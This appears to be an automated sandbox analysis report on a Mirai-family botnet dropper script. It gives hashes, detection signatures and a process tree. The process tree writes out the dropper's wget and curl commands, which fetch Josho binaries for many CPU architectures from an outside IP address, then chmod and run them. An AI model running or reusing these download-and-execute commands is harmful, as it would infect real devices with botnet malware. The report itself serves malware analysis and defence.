Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240226-en
  • resource tags
    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240226-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    27-04-2024 17:59

General

  • Target
    8UsA.sh
  • Size
    1KB
  • MD5
    d060b7e197e9a5ef62013de9b1246b0e
  • SHA1
    954455791558cc2be3dc1b451f70a40e1de04f3a
  • SHA256
    09ae6fb139fb48daf4a6fb4c6754a040367836054ed902f19211806696470cc9
  • SHA512
    338d74f70ad3b05762ea3a1e127e00d1e08ffd1c4569d7745b58894bfec1304ef353a40229271f342266637fc2eed2390cb7922c7dadce5b365a8c18e83a82df

Score
10/10

Malware Config

Extracted

  • Family
    mirai
  • Botnet
    JOSHO

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Executes dropped EXE (10 IoCs)
  • Modifies Watchdog functionality (1 TTPs, 20 IoCs)

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Changes its process name (10 IoCs)
  • Writes file to tmp directory (20 IoCs)

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/8UsA.sh
    /tmp/8UsA.sh
    1⤵
    • Writes file to tmp directory
    PID:1575
    • /usr/bin/wget
      wget http://209.14.69.249/AB4g5/Josho.x86
      2⤵
      • Writes file to tmp directory
      PID:1576
    • /usr/bin/curl
      curl -O http://209.14.69.249/AB4g5/Josho.x86
      2⤵
      • Writes file to tmp directory
      PID:1591
    • /bin/cat
      cat Josho.x86
      2⤵
      PID:1592
    • /bin/chmod
      chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
      2⤵
      PID:1593
    • /tmp/3AvA
      ./3AvA ssh
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Changes its process name
      PID:1594
    • /usr/bin/wget
      wget http://209.14.69.249/AB4g5/Josho.mips
      2⤵
      • Writes file to tmp directory
      PID:1597
    • /usr/bin/curl
      curl -O http://209.14.69.249/AB4g5/Josho.mips
      2⤵
      • Writes file to tmp directory
      PID:1599
    • /bin/chmod
      chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
      2⤵
      PID:1601
    • /tmp/3AvA
      ./3AvA ssh
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Changes its process name
      PID:1602
    • /usr/bin/wget
      wget http://209.14.69.249/AB4g5/Josho.mpsl
      2⤵
      • Writes file to tmp directory
      PID:1605
    • /usr/bin/curl
      curl -O http://209.14.69.249/AB4g5/Josho.mpsl
      2⤵
      • Writes file to tmp directory
      PID:1607
    • /bin/chmod
      chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
      2⤵
      PID:1609
    • /tmp/3AvA
      ./3AvA ssh
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Changes its process name
      PID:1610
    • /usr/bin/wget
      wget http://209.14.69.249/AB4g5/Josho.arm4
      2⤵
      PID:1613
    • /usr/bin/curl
      curl -O http://209.14.69.249/AB4g5/Josho.arm4
      2⤵
      • Writes file to tmp directory
      PID:1615
    • /bin/chmod
      chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
      2⤵
      PID:1617
    • /tmp/3AvA
      ./3AvA ssh
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Changes its process name
      PID:1618
    • /usr/bin/wget
      wget http://209.14.69.249/AB4g5/Josho.arm5
      2⤵
      • Writes file to tmp directory
      PID:1621
    • /usr/bin/curl
      curl -O http://209.14.69.249/AB4g5/Josho.arm5
      2⤵
      • Writes file to tmp directory
      PID:1623
    • /bin/chmod
      chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
      2⤵
      PID:1625
    • /tmp/3AvA
      ./3AvA ssh
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Changes its process name
      PID:1626
    • /usr/bin/wget
      wget http://209.14.69.249/AB4g5/Josho.arm6
      2⤵
      • Writes file to tmp directory
      PID:1629
    • /usr/bin/curl
      curl -O http://209.14.69.249/AB4g5/Josho.arm6
      2⤵
      • Writes file to tmp directory
      PID:1631
    • /bin/chmod
      chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
      2⤵
      PID:1633
    • /tmp/3AvA
      ./3AvA ssh
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Changes its process name
      PID:1634
    • /usr/bin/wget
      wget http://209.14.69.249/AB4g5/Josho.arm7
      2⤵
      • Writes file to tmp directory
      PID:1637
    • /usr/bin/curl
      curl -O http://209.14.69.249/AB4g5/Josho.arm7
      2⤵
      • Writes file to tmp directory
      PID:1639
    • /bin/chmod
      chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
      2⤵
      PID:1641
    • /tmp/3AvA
      ./3AvA ssh
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Changes its process name
      PID:1642
    • /usr/bin/wget
      wget http://209.14.69.249/AB4g5/Josho.ppc
      2⤵
      • Writes file to tmp directory
      PID:1645
    • /usr/bin/curl
      curl -O http://209.14.69.249/AB4g5/Josho.ppc
      2⤵
      • Writes file to tmp directory
      PID:1647
    • /bin/chmod
      chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
      2⤵
      PID:1649
    • /tmp/3AvA
      ./3AvA ssh
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Changes its process name
      PID:1650
    • /usr/bin/wget
      wget http://209.14.69.249/AB4g5/Josho.m68k
      2⤵
      • Writes file to tmp directory
      PID:1653
    • /usr/bin/curl
      curl -O http://209.14.69.249/AB4g5/Josho.m68k
      2⤵
      • Writes file to tmp directory
      PID:1655
    • /bin/chmod
      chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
      2⤵
      PID:1657
    • /tmp/3AvA
      ./3AvA ssh
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Changes its process name
      PID:1658
    • /usr/bin/wget
      wget http://209.14.69.249/AB4g5/Josho.sh4
      2⤵
      • Writes file to tmp directory
      PID:1661
    • /usr/bin/curl
      curl -O http://209.14.69.249/AB4g5/Josho.sh4
      2⤵
      • Writes file to tmp directory
      PID:1663
    • /bin/chmod
      chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.sh4 Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
      2⤵
      PID:1665
    • /tmp/3AvA
      ./3AvA ssh
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Changes its process name
      PID:1666

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/Josho.x86
    Filesize
    46KB
    MD5
    a648e3916f191a59f47d07a49702d0eb
    SHA1
    1d9280fd392858f5dbe61aea4cfa2453ade97442
    SHA256
    0a82c84b8564ae5a178e3e8f6fc4550885055043928ee667e59efb035f9ccfc3
    SHA512
    73ef7ce042d0d165c327acd50e984a08b3d8450fb8821c8ef390a8dc02044128836ba7590bd035a072a9b7a4c94defed1256e85b03887788fa998e5648b5e587